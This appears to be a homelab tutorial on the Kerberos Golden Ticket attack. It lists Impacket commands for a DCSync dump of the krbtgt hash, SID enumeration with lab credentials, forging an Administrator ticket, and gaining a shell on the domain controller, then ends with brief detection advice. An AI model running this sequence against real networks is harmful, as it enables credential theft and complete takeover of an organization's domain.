Golden Ticket

Introduction

A golden ticket is a forge Kerberos Ticket Granting Ticket (TGT). With this ticket, attacker can impersonate anyuser, include domain admins, and access any service in the domain.

A Golden Ticket is encrypted and signed using the KRBTGT account's password hash. Since this hash is used by the KDC service to sign all Kerberos tickets, any forged ticket signed with the KRBTGT password hash will be trusted by the KDC as if it were legitimate.

Attack Path

To perform this attack, we will need those arguments: domain's SID and krbtgt password hash

The KRBTGT password hash can be obtained using a DCSync attack. The command below performs the DCSync attack:

impacket-secretsdump <domain_name>/<username:password>@<target_domain_controller>>
DCSync attack

Enumerate domain's SID:

impacket-lookupsid jstone:dragon@192.168.126.145 -domain-sids
lookupsid.py

Now we can forge a TGT. I will use ticketer.py from Impacket, as shown in the command below: 

impacket-ticketer -nthash <krbtgt_password_hash> -domain-sid <SID> -domain homelab.local Administrator
Create Golden Ticket with Administrator account

The ticket is saved in Administrator.ccache. We will use wmiexec.py to use this ticket to gain access to DC1 as Administrator. Since wmiexec.py grabs credentials from the ccache file (specified by KRB5CCNAME), we need to set the KRB5CCNAME variable to the value Administrator.ccache.

wmiexec -help

The command below will set value of Administrator.ccache to KRB5CCNAME

export KRB5CCNAME=Administrator.ccache

After this, we can use klist to check the Kerberos ticket that we have:

After confirming that the ticket is available in KRB5CCNAME, we will run the command below to gain access to DC1.

impacket-wmiexec homelab.local/Administrator@DC1.homelab.local -k -no-pass

Detection

To detect this attack, we can look for suspicious logon events. For example, an unusual IP address logging into the Administrator account on the Domain Controller. (Assuming we know that, under normal circumstances, this IP is not expected to log into the Administrator account.)

Event that capture attack machine log in to Administrator's account

Moreove, we can look for event thata service ticket (TGS) request made by a user who hasn't obtained a Ticket Granting Ticket (TGT) beforehand

References:

https://academy.hackthebox.com/module/176/section/1785academy.hackthebox.com
Kerberos Golden Tickets are Now More GoldenActive Directory Security
PreviousDCSync

Last updated